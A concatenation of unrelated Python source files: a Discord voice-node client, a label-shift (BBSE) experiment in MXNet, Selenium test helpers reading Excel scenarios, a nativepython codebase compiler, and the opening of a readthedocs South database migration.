Optional keyword arguments to pass to the created Node.
Returns
-------
:py:class:`typing.Protocol` [ :py:class:`BaseNode` ]
The Node that was created.
Raises
------
:py:class:`NodeCreationError`
Either a Node with the given identifier already exists, or the given class was not a subclass of :py:class:`BaseNode`.
:py:class:`NodeConnectionError`
There was an error while connecting to the external node. Could mean there was invalid authorization or an incorrect host address/port, etc.
"""
await self.bot.wait_until_ready()
if identifier in self.nodes.keys():
raise NodeCreationError(f'Node with identifier \'{identifier}\' already exists.')
if not issubclass(cls, BaseNode):
raise NodeCreationError(f'The \'node\' argument must be a subclass of \'{BaseNode.__name__}\'.')
node = cls(client=self, host=host, port=port, password=password, identifier=identifier, **kwargs)
__log__.debug(f'Node | Attempting \'{node.__class__.__name__}\' connection with identifier \'{identifier}\'.')
await node.connect()
return node
def get_node(self, *, identifier: Optional[str] = None) -> Optional[Protocol[BaseNode]]:
"""
Returns the Node with the given identifier.
Parameters
----------
identifier: :py:class:`typing.Optional` [ :py:class:`str` ]
The identifier of the Node to return. If not passed a random Node will be returned.
Returns
-------
:py:class:`typing.Optional` [ :py:class:`typing.Protocol` [ :py:class:`BaseNode` ] ]
The Node that was found. Could return :py:class:`None` if no Nodes with the given identifier were found.
Raises
------
:py:class:`NoNodesAvailable`
Raised if there are no Nodes available.
"""
available_nodes = {identifier: node for identifier, node in self._nodes.items() if node.is_connected}
if not available_nodes:
raise NoNodesAvailable('There are no Nodes available.')
if identifier is None:
return random.choice([node for node in available_nodes.values()])
return available_nodes.get(identifier, None)
async def create_player(self, *, channel: discord.VoiceChannel, node_identifier: Optional[str] = None, cls: Optional[Type[Protocol[Player]]] = Player) -> Protocol[Player]:
"""
Creates a Player for the given :py:class:`discord.VoiceChannel`.
Parameters
----------
channel: :py:class:`discord.VoiceChannel`
The discord voice channel to connect the Player too.
node_identifier: :py:class:`typing.Optional` [ :py:class:`str` ]
A Node identifier to create the Player on. If not passed a random Node will be chosen.
cls: :py:class:`typing.Type` [ :py:class:`typing.Protocol` [ :py:class:`Player` ] ]
The class used to implement the base Player features. Must be a subclass of :py:class:`Player`. Defaults to the Player supplied with Slate.
Returns
-------
:py:class:`typing.Protocol` [ :py:class:`Player` ]
The Player that was created.
Raises
------
:py:class:`NodeNotFound`
Raised if a Node with the given identifier was not found.
:py:class:`NoNodesAvailable`
Raised if there are no Nodes available.
:py:class:`PlayerAlreadyExists`
Raised if a Player for the voice channel already exists.
"""
node = self.get_node(identifier=node_identifier)
if not node and node_identifier:
raise NodeNotFound(f'Node with identifier \'{node_identifier}\' was not found.')
if channel.guild.id in self.players.keys():
raise PlayerAlreadyExists(f'Player for guild \'{channel.guild!r}\' already exists.')
__log__.debug(f'PLAYER | Attempting player creation for guild: {channel.guild!r}')
player = await channel.connect(cls=cls)
player._node = node
node._players[channel.guild.id] = player
return player
def get_player(self, *, guild: discord.Guild) -> Optional[Protocol[Player]]:
"""
Returns the Player for the given :py:class:`discord.Guild`.
Parameters
----------
guild: :py:class:`discord.Guild`
The discord guild to return the Player for.
Returns
-------
:py:class:`typing.Optional` [ :py:class:`typing.Protocol` [ :py:class:`Player` ] ]
The Player for the given discord guild. Could be :py:class:`None` if the guild does not already have a Player.
"""
return self.players.get(guild.id, None)
|
from scipy import stats
from statsmodels.distributions.empirical_distribution import ECDF
import mxnet as mx
import numpy as np
from mxnet import nd, autograd, gluon
# three customized modules
from labelshift import *
from utils4gluon import *
from data_shift import *
from data import *
def correction_experiment(dataset_name=None,
tweak_train=None,
p_P=None, tweak_test=None, p_Q=None,
num_train_samples=None,
num_val_samples=None,
num_test_samples=None,
num_hidden=None,
epochs=None,
batch_size=None):
# set the context for compute
ctx = mx.gpu()
# set the context for data
data_ctx = mx.gpu()
# load the dataset
X, y, Xtest, ytest = load_data(dataset_name)
n = X.shape[0]
dfeat = np.prod(X.shape[1:])
# NOTE FOR IMPROVEMENT: eventually this should be returned by the data library
num_labels = 10
################################################
# Random permutation of the data
################################################
rand_idx = np.random.permutation(n)
X = X[rand_idx,...]
y = y[rand_idx]
################################################
# First split examples between train and validation
################################################
num = 2
Xtrain_source = X[:(n//num),:,:,:]
ytrain_source = y[:(n//num)]
Xval_source = X[(n//num):(2*n//num),:,:,:]
yval_source = y[(n//num):(2*n//num):]
################################################
# Set the label distribution at train time
################################################
if tweak_train:
# print("Sampling training and validation data from p_P")
# print("Current p_P: ", p_P)
Xtrain, ytrain = tweak_dist(Xtrain_source, ytrain_source, num_labels, num_train_samples, p_P)
Xval, yval = tweak_dist(Xval_source, yval_source, num_labels, num_val_samples, p_P)
else:
Xtrain, ytrain = Xtrain_source, ytrain_source
Xval, yval = Xval_source, yval_source
################################################
# Set the label distribution for test data
################################################
if tweak_test:
# print("Sampling test data from p_Q")
# print("Current p_Q: ", p_Q)
Xtest, ytest = tweak_dist(Xtest, ytest, num_labels, num_test_samples, p_Q)
####################################
# Train on p_P
####################################
net = gluon.nn.HybridSequential()
with net.name_scope():
net.add(gluon.nn.Dense(num_hidden, activation="relu"))
net.add(gluon.nn.Dense(num_hidden, activation="relu"))
net.add(gluon.nn.Dense(num_labels))
net.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx)
softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate': .1})
net.hybridize()
# Training
weighted_train(net, softmax_cross_entropy, trainer, Xtrain, ytrain, Xval, yval, ctx, dfeat, epoch=epochs, weightfunc=None, data_ctx=data_ctx)
# Prediction
ypred_s, ypred_s_soft = predict_all(Xval, net, ctx, dfeat)
ypred_t, ypred_t_soft = predict_all(Xtest, net, ctx, dfeat)
# Converting to numpy array for later convenience
ypred_s= ypred_s.asnumpy()
ypred_s_soft = ypred_s_soft.asnumpy()
ypred_t = ypred_t.asnumpy()
ypred_t_soft = ypred_t_soft.asnumpy()
####################################
# Estimate Wt and Py
####################################
wt = estimate_labelshift_ratio(yval, ypred_s, ypred_t,num_labels)
Py_est = estimate_target_dist(wt, yval,num_labels)
Py_true = calculate_marginal(ytest,num_labels)
Py_base = calculate_marginal(yval,num_labels)
wt_true = Py_true/Py_base
print(np.concatenate((wt,wt_true),axis=1))
print(np.concatenate((Py_est,Py_true),axis=1))
# print("||wt - wt_true||^2 = " + repr(np.sum((wt-wt_true)**2)/np.linalg.norm(wt_true)**2))
# print("KL(Py_est|| Py_true) = " + repr(stats.entropy(Py_est,Py_base)))
####################################
# Solve weighted ERM and compare to previously trained models
####################################
data_test = mx.io.NDArrayIter(Xtest, ytest, batch_size, shuffle=False)
acc_unweighted = evaluate_accuracy(data_test, net, ctx, dfeat) # in fact, drawing confusion matrix maybe more informative
print("Accuracy unweighted", acc_unweighted)
training_weights=np.maximum(wt, 0)
wt_ndarray = nd.array(training_weights,ctx=ctx)
weightfunc = lambda x,y: wt_ndarray[y.asnumpy().astype(int)]
# Train a model using the following!
net2 = gluon.nn.HybridSequential()
with net2.name_scope():
net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
net2.add(gluon.nn.Dense(num_labels))
net2.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx)
trainer2 = gluon.Trainer(net2.collect_params(), 'sgd', {'learning_rate': .1})
net2.hybridize()
# NOTE WE ASSUME SAME NUMBER OF EPOCHS IN PERIOD 1 and PERIOD 2
# Training
weighted_train(net2, softmax_cross_entropy, trainer2, Xtrain, ytrain,
Xval, yval, ctx, dfeat, epoch=epochs, weightfunc=weightfunc, data_ctx=data_ctx)
data_test.reset()
acc_weighted = evaluate_accuracy(data_test, net2, ctx, dfeat)
print("Accuracy weighted", acc_weighted)
return {"acc_unweighted": acc_unweighted,
"acc_weighted": acc_weighted,
"wt": wt,
"wt_true": wt_true,
"wt_l2": np.sum((wt-wt_true)**2)/np.linalg.norm(wt_true)**2,
"kl_div": stats.entropy(Py_est,Py_base),
"ypred_s": ypred_s,
"ypred_s_soft": ypred_s_soft,
"ypred_t:": ypred_t,
"ypred_t_soft": ypred_t_soft,
}
def correction_experiment_benchmark(methods, dataset_name=None,
tweak_train=None,
p_P=None, tweak_test=None, p_Q=None,
num_train_samples=None,
num_test_samples=None,
num_hidden=None,
epochs=None,
batch_size=None,
ctx=None,cnn_flag=False):
# "methods" are a list of lambda functions that take X, y, X_test (and optionally a blackbox predictor f)
# as inputs and output a "weightvec"
# For example:
# - unweighted training will return a weightvec = the all 1 vector.
# - BBSE will train a classifier with half of the training data, and using the other half for estimating
# - Logistic regression approach will try to predict whether X belongs to train or test,
# and then use the softmax probability for each data set.
# - KunZhang's method will match moments in a hilbert space to get some weights (not very scalable.. depend on matlab)
# A number of these methods are implemented below
# set the context for compute
if ctx is None:
ctx = mx.cpu()
# set the context for data
data_ctx = ctx
# load the dataset
X, y, Xtest, ytest = load_data(dataset_name)
n = X.shape[0]
dfeat = np.prod(X.shape[1:])
# NOTE FOR IMPROVEMENT: eventually this should be returned by the data library
num_labels = 10
################################################
# Random permutation of the data
################################################
rand_idx = np.random.permutation(n)
X = X[rand_idx, ...]
y = y[rand_idx]
################################################
# Tweak the distributions by weighted resampling
################################################
if tweak_train:
# print("Sampling training and validation data from p_P")
# print("Current p_P: ", p_P)
Xtrain, ytrain = tweak_dist(X, y, num_labels, num_train_samples, p_P)
if tweak_test:
# print("Sampling test data from p_Q")
# print("Current p_Q: ", p_Q)
Xtest, ytest = tweak_dist(Xtest, ytest, num_labels, num_test_samples, p_Q)
# make sure that the feature is reshaped into a data matrix
#Xtrain = Xtrain.reshape((-1, dfeat))
#Xtest = Xtest.reshape((-1,dfeat))
weightvecs = []
for func in methods:
beta = func(Xtrain, ytrain, Xtest)
weightvecs.append(beta)
####################################
# Get the Q(y)/P(y) for each y. For the sake of comparing weight estimation.
####################################
# This is the importance weight under label-shift
wt_list = []
Py_est_list = []
for beta in weightvecs:
wt = beta_to_w(beta, ytrain, num_labels)
wt_list.append(wt)
Py_est = estimate_target_dist(wt, ytrain, num_labels)
Py_est_list.append(Py_est)
####################################
# Solve weighted ERM for all methods
####################################
acc_list = []
softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
for beta in weightvecs:
# clip the weights
training_weights = np.maximum(beta, 0)
net2 = gluon.nn.HybridSequential()
if cnn_flag:
with net2.name_scope():
net2.add(gluon.nn.Conv2D(channels=20, kernel_size=5, activation='relu'))
net2.add(gluon.nn.MaxPool2D(pool_size=2, strides=2))
net2.add(gluon.nn.Conv2D(channels=50, kernel_size=5, activation='relu'))
net2.add(gluon.nn.MaxPool2D(pool_size=2, strides=2))
# The Flatten layer collapses all axis, except the first one, into one axis.
net2.add(gluon.nn.Flatten())
net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
net2.add(gluon.nn.Dense(num_labels))
else:
with net2.name_scope():
net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
net2.add(gluon.nn.Dense(num_hidden, activation="relu"))
net2.add(gluon.nn.Dense(num_labels))
net2.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx, force_reinit=True)
trainer2 = gluon.Trainer(net2.collect_params(), 'sgd', {'learning_rate': .1})
net2.hybridize()
# NOTE WE ASSUME SAME NUMBER OF EPOCHS IN PERIOD 1 and PERIOD 2
# Training
weighted_train(net2, softmax_cross_entropy, trainer2, Xtrain, ytrain,
Xtest, ytest, ctx, dfeat, epoch=epochs, weightvec=training_weights,
data_ctx=data_ctx, cnn_flag=cnn_flag)
# while Xtest and ytest are passed into that, they are not used for training
data_test = mx.io.NDArrayIter(Xtest, ytest, batch_size, shuffle=False)
data_test.reset()
acc_weighted = evaluate_accuracy(data_test, net2, ctx, dfeat, cnn_flag=cnn_flag)
ypred_t, ypred_t_soft = predict_all(Xtest, net2, ctx, dfeat, cnn_flag=cnn_flag)
C = confusion_matrix(ytest, ypred_t.asnumpy(), num_labels)
Cp = confusion_matrix_probabilistic(ytest, ypred_t_soft.asnumpy(), num_labels)
acc_list.append([acc_weighted,C,Cp])
for item in acc_list:
print("Accuracy weighted = ", item[0])
return {"acc_list": acc_list, "wt_list": wt_list}
def BBSE(X,y,Xtest,ctx=mx.cpu(),num_hidden=256,epochs=5,useProb=False,cnn_flag=False):
# set the context for data
data_ctx = ctx
n = X.shape[0]
dfeat = np.prod(X.shape[1:])
# NOTE FOR IMPROVEMENT: eventually this should be returned by the data library
num_labels = 10
################################################
# Random permutation of the data
################################################
rand_idx = np.random.permutation(n)
XX = X[rand_idx, ...]
yy = y[rand_idx]
################################################
# First split examples between train and validation
################################################
num = 2
Xtrain = XX[:(n//num),...]
ytrain = yy[:(n//num)]
Xval = XX[(n//num):(2*n//num),...]
yval = yy[(n//num):(2*n//num):]
####################################
# Train on p_P
####################################
net = gluon.nn.HybridSequential()
if cnn_flag:
with net.name_scope():
net.add(gluon.nn.Conv2D(channels=20, kernel_size=5, activation='relu'))
net.add(gluon.nn.MaxPool2D(pool_size=2, strides=2))
net.add(gluon.nn.Conv2D(channels=50, kernel_size=5, activation='relu'))
net.add(gluon.nn.MaxPool2D(pool_size=2, strides=2))
# The Flatten layer collapses all axis, except the first one, into one axis.
net.add(gluon.nn.Flatten())
net.add(gluon.nn.Dense(num_hidden, activation="relu"))
net.add(gluon.nn.Dense(num_labels))
else:
with net.name_scope():
net.add(gluon.nn.Dense(num_hidden, activation="relu"))
net.add(gluon.nn.Dense(num_hidden, activation="relu"))
net.add(gluon.nn.Dense(num_labels))
net.collect_params().initialize(mx.init.Xavier(magnitude=2.24), ctx=ctx)
softmax_cross_entropy = gluon.loss.SoftmaxCrossEntropyLoss()
trainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate': .1})
net.hybridize()
# Training
weighted_train(net, softmax_cross_entropy, trainer, Xtrain, ytrain, Xval, yval, ctx, dfeat, epoch=epochs,
weightfunc=None, data_ctx=data_ctx, cnn_flag=cnn_flag)
# Prediction
ypred_s, ypred_s_soft = predict_all(Xval, net, ctx, dfeat, cnn_flag=cnn_flag)
ypred_t, ypred_t_soft = predict_all(Xtest, net, ctx, dfeat, cnn_flag=cnn_flag)
# Converting to numpy array for later convenience
ypred_s = ypred_s.asnumpy()
ypred_s_soft = ypred_s_soft.asnumpy()
ypred_t = ypred_t.asnumpy()
ypred_t_soft = ypred_t_soft.asnumpy()
####################################
# Estimate Wt
####################################
if useProb:
wt = estimate_labelshift_ratio(yval, ypred_s_soft, ypred_t_soft, num_labels)
else:
wt = estimate_labelshift_ratio(yval, ypred_s, ypred_t, num_labels)
return w_to_beta(wt,y) |
'''
Created on 24.05.2014
@author: ionitadaniel19
'''
import logging.config
import os
import json
from xlsmanager import easyExcel
from constants import *
import traceback
import copy
def setup_logging(default_path='logging.json', default_level=logging.INFO,env_key='LOG_CFG'):
"""Setup logging configuration"""
path = os.path.join(os.path.dirname(os.path.abspath(__file__)),default_path)
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'r') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=default_level)
def load_browser_driver(browser_driver_path):
"""Setup browser driver configuration"""
return os.path.join(os.path.dirname(os.path.abspath(__file__)),browser_driver_path)
def get_webdriver_selector_element(element_name):
element=None
selector=None
if element_name.startswith("css="):
element = element_name.split('=', 1)[-1]
selector= SELECTOR_CSS
elif element_name.startswith("xpath=") or element_name.startswith("//"):
element = element_name.split('=', 1)[-1]
selector= SELECTOR_XPATH
elif element_name.startswith("id="):
element = element_name.split('=', 1)[-1]
selector= SELECTOR_ID
elif element_name.startswith("link="):
element = element_name.split('=', 1)[-1]
selector= SELECTOR_LINK
elif element_name.startswith("name=") or element_name.find("=") == -1:
element = element_name.split('=', 1)[-1]
selector= SELECTOR_NAME
elif element_name.startswith("class="):
element = element_name.split('=', 1)[-1]
selector= SELECTOR_CLASS
elif element_name.startswith("tag="):
element = element_name.split('=', 1)[-1]
selector= SELECTOR_TAG
else:
raise Exception("Incorrect element %s.It should be one of type:css,xpath,id,link,name,class,tag." %element_name)
return (selector,element)
def get_data_driven_scenario_values(scenario_id=1,xls_file=DEF_DATA_PATH,sheet_name="Data"):
data_xls_keys_cols={'scenario':1,'login':2,'select':4}
data_driven_data={CELL_USER:'',CELL_PWD:'',CELL_ANSWER:'',CELL_EXPECTED:''}
try:
xls_sheet=easyExcel(xls_file,sheet_name)
last_row=xls_sheet.get_sheet_last_row(sheet_name)
found=False
scenario_row=0
for row in range(1,last_row):
if xls_sheet.getCell(row,data_xls_keys_cols['scenario'])==scenario_id:
found=True
scenario_row=row
break
if found is False:
raise Exception('Scenarion %s not found in xls file %s sheet %s' %(scenario_id,xls_file,sheet_name))
#stop at finding blank value or exit at index 5
for index_row in range(scenario_row,scenario_row+5):
if xls_sheet.getCell(index_row,data_xls_keys_cols['login'])==None:
break
if xls_sheet.getCell(index_row,data_xls_keys_cols['login'])==CELL_USER:
#actual values is one column to the right
data_driven_data[CELL_USER]=xls_sheet.getCell(index_row,data_xls_keys_cols['login']+1)
if xls_sheet.getCell(index_row,data_xls_keys_cols['login'])==CELL_PWD:
data_driven_data[CELL_PWD]=xls_sheet.getCell(index_row,data_xls_keys_cols['login']+1)
if xls_sheet.getCell(index_row,data_xls_keys_cols['select'])==CELL_ANSWER:
data_driven_data[CELL_ANSWER]=xls_sheet.getCell(index_row,data_xls_keys_cols['select']+1)
if xls_sheet.getCell(index_row,data_xls_keys_cols['select'])==CELL_EXPECTED:
data_driven_data[CELL_EXPECTED]=xls_sheet.getCell(index_row,data_xls_keys_cols['select']+1)
index_row=index_row+1
return data_driven_data
except Exception,ex:
print ex
return None
finally:
xls_sheet.close()
def get_simple_hybrid_driven_scenario_values(scenario_id=1,xls_file=DEF_DATA_PATH,sheet_name="HybridSimple"):
data_xls_keys_cols={'scenario':1,'function':2,'parameters':3}
hybrid_driven_dict={FRAMEWORK_FUNCTIONS:'',PARAMETERS:[]}
hybrid_driven_data=[] #list of dictionaries of hybrid_driven_dict type
try:
xls_sheet=easyExcel(xls_file,sheet_name)
last_row=xls_sheet.get_sheet_last_row(sheet_name)
found=False
scenario_row=0
for row in range(1,last_row):
if xls_sheet.getCell(row,data_xls_keys_cols['scenario'])==scenario_id:
found=True
scenario_row=row
break
if found is False:
raise Exception('Scenarion %s not found in xls file %s sheet %s' %(scenario_id,xls_file,sheet_name))
#stop at finding blank value or exit at index 5
for index_row in range(scenario_row,scenario_row+5):
if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==None:
break
temp_hybrid_dict=copy.deepcopy(hybrid_driven_dict)
if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==CELL_F_REMEMBER_ME:
temp_hybrid_dict[FRAMEWORK_FUNCTIONS]=CELL_F_REMEMBER_ME
if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
temp_hybrid_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==CELL_F_LOGIN:
temp_hybrid_dict[FRAMEWORK_FUNCTIONS]=CELL_F_LOGIN
if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
temp_hybrid_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==CELL_F_SELECT_ANSWER:
temp_hybrid_dict[FRAMEWORK_FUNCTIONS]=CELL_F_SELECT_ANSWER
if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
temp_hybrid_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==CELL_F_SHOW_ANSWER:
temp_hybrid_dict[FRAMEWORK_FUNCTIONS]=CELL_F_SHOW_ANSWER
if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
temp_hybrid_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
hybrid_driven_data.append(temp_hybrid_dict)
index_row=index_row+1
return hybrid_driven_data
except Exception,ex:
print ex
return None
finally:
xls_sheet.close()
def get_keywords_driven_scenario_values(scenario_id=1,xls_file=DEF_DATA_PATH,sheet_name="Keyword"):
data_xls_keys_cols={'scenario':1,'action':2,'window':3,'locator':4,'parameters':5}
keyword_driven_dict={FRAMEWORK_FUNCTIONS:'',PARAMETERS:[],PAGE_WINDOW:'',LOCATOR:''}
keyword_driven_data=[] #list of dictionaries of keyword_driven_dict type
try:
xls_sheet=easyExcel(xls_file,sheet_name)
last_row=xls_sheet.get_sheet_last_row(sheet_name)
found=False
scenario_row=0
for row in range(1,last_row):
if xls_sheet.getCell(row,data_xls_keys_cols['scenario'])==scenario_id:
found=True
scenario_row=row
break
if found is False:
raise Exception('Scenarion %s not found in xls file %s sheet %s' %(scenario_id,xls_file,sheet_name))
#get next scenario
for next_row in range(scenario_row,last_row):
if xls_sheet.getCell(row,data_xls_keys_cols['scenario'])!=None:
next_scenario_row=next_row
#stop at finding blank value or next scenario value
for index_row in range(scenario_row,next_scenario_row):
if xls_sheet.getCell(index_row,data_xls_keys_cols['action'])==None:
break
temp_keyword_dict=copy.deepcopy(keyword_driven_dict)
temp_keyword_dict[FRAMEWORK_FUNCTIONS]=xls_sheet.getCell(index_row,data_xls_keys_cols['action'])
if xls_sheet.getCell(index_row,data_xls_keys_cols['window'])!=None:
temp_keyword_dict[PAGE_WINDOW]=xls_sheet.getCell(index_row,data_xls_keys_cols['window'])
if xls_sheet.getCell(index_row,data_xls_keys_cols['locator'])!=None:
temp_keyword_dict[LOCATOR]=xls_sheet.getCell(index_row,data_xls_keys_cols['locator'])
if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
temp_keyword_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
keyword_driven_data.append(temp_keyword_dict)
index_row=index_row+1
return keyword_driven_data
except Exception,ex:
print ex
return None
finally:
xls_sheet.close()
|
# Copyright 2019 Nativepython Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nativepython.python_to_native_converter as python_to_native_converter
import nativepython.native_ast as native_ast
import nativepython.llvm_compiler as llvm_compiler
import nativepython
import ctypes
import tempfile
import os
from typed_python import _types
from typed_python import Function, NoneType
from typed_python import Codebase
from typed_python.internals import FunctionOverload
typeWrapper = lambda t: python_to_native_converter.typedPythonTypeToTypeWrapper(t)
class CompiledCodebase:
def __init__(self, codebase, sharedObject, nativeTargets, typedTargets):
self.codebase = codebase
self.sharedObject = sharedObject
self.nativeTargets = nativeTargets
self.typedTargets = typedTargets
def install(self):
compiler = llvm_compiler.Compiler()
function_pointers = compiler.link_binary_shared_object(
self.sharedObject,
self.nativeTargets,
os.path.join(self.codebase.rootDirectory, "__pycache__", "nativepython")
)
for wrappingCallTargetName, (f,callTarget) in self.typedTargets.items():
fp = function_pointers[wrappingCallTargetName]
f._installNativePointer(
fp.fp,
callTarget.output_type.typeRepresentation if callTarget.output_type is not None else NoneType,
[i.typeRepresentation for i in callTarget.input_types]
)
class CodebaseCompiler:
def __init__(self, codebase):
self.codebase = codebase
self.llvm_compiler = llvm_compiler.Compiler()
self.converter = python_to_native_converter.PythonToNativeConverter()
self.walkCodebase()
self.compiledCodebase = self.compileModule()
@staticmethod
def compile(codebase):
"""Compile a typed_python.Codebase into a CompiledCodebase."""
return CodebaseCompiler(codebase).compiledCodebase
def walkCodebase(self):
"""Walk a typed_python.Codebase and compile all valid entrypoints, producing a CompiledCodebase.
We find all 'Class' objects, all 'Function' objects, and all 'Instantation' objects,
and compile them all into a single module.
"""
functions = []
for name, object in self.codebase.allModuleLevelValues():
if hasattr(object, '__typed_python_category__'):
if object.__typed_python_category__ == "Class":
for f in object.MemberFunctions.values():
functions.append(f)
if object.__typed_python_category__ == "Function":
functions.append(object)
self.targets = {}
for f in functions:
self._convert(f, None)
def compileModule(self):
native_targets = self.converter.extract_new_function_definitions()
sharedObject = self.llvm_compiler.compile_functions_and_return_shared_object(native_targets)
return CompiledCodebase(self.codebase, sharedObject, native_targets, self.targets)
def _convert(self, f, argument_types):
argument_types = argument_types or {}
if isinstance(f, FunctionOverload):
for a in f.args:
assert not a.isStarArg, 'dont support star args yet'
assert not a.isKwarg, 'dont support keyword yet'
def chooseTypeFilter(a):
return argument_types.pop(a.name, a.typeFilter or object)
input_wrappers = [typeWrapper(chooseTypeFilter(a)) for a in f.args]
if len(argument_types):
raise Exception("No argument exists for type overrides %s" % argument_types)
callTarget = self.converter.convert(f.functionObj, input_wrappers, f.returnType, assertIsRoot=True)
assert callTarget is not None
wrappingCallTargetName = self.converter.generateCallConverter(callTarget)
self.targets[wrappingCallTargetName] = (f, callTarget)
if hasattr(f, '__typed_python_category__') and f.__typed_python_category__ == 'Function':
for o in f.overloads:
self._convert(o, argument_types)
return f
if hasattr(f, '__typed_python_category__') and f.__typed_python_category__ == 'BoundMethod':
for o in f.Function.overloads:
arg_types = dict(argument_types)
arg_types[o.args[0].name] = typeWrapper(f.Class)
self._convert(o, arg_types)
return f
|
<filename>readthedocs/projects/migrations/0001_initial.py<gh_stars>1-10
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Project'
db.create_table('projects_project', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='projects', to=orm['auth.User'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
('description', self.gf('django.db.models.fields.TextField')(blank=True)),
('repo', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
('docs_directory', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('project_url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('pub_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified_date', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('version', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
('copyright', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('theme', self.gf('django.db.models.fields.CharField')(default='default', max_length=20)),
('path', self.gf('django.db.models.fields.CharField')(max_length=255)),
('suffix', self.gf('django.db.models.fields.CharField')(default='.rst', max_length=10)),
('extensions', self.gf('django.db.models.fields.CharField')(default='', max_length=255)),
('status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
))
db.send_create_signal('projects', ['Project'])
# Adding model 'File'
db.create_table('projects_file', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(related_name='files', to=orm['projects.Project'])),
('parent', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='children', null=True, to=orm['projects.File'])),
('heading', self.gf('django.db.models.fields.CharField')(max_length=255)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
('content', self.gf('django.db.models.fields.TextField')()),
('denormalized_path', self.gf('django.db.models.fields.CharField')(max_length=255)),
('ordering', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
('status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
))
db.send_create_signal('projects', ['File'])
# Adding model 'FileRevision'
db.create_table('projects_filerevision', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('file', self.gf('django.db.models.fields.related.ForeignKey')(related_name='revisions', to=orm['projects.File'])),
('comment', self.gf('django.db.models.fields.TextField')(blank=True)),
('diff', self.gf('django.db.models.fields.TextField')(blank=True)),
('created_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('revision_number', self.gf('django.db.models.fields.IntegerField')()),
('is_reverted', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('projects', ['FileRevision'])
def backwards(self, orm):
# Deleting model 'Project'
db.delete_table('projects_project')
# Deleting model 'File'
db.delete_table('projects_file')
# Deleting model 'FileRevision'
db.delete_table('projects_filerevision')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
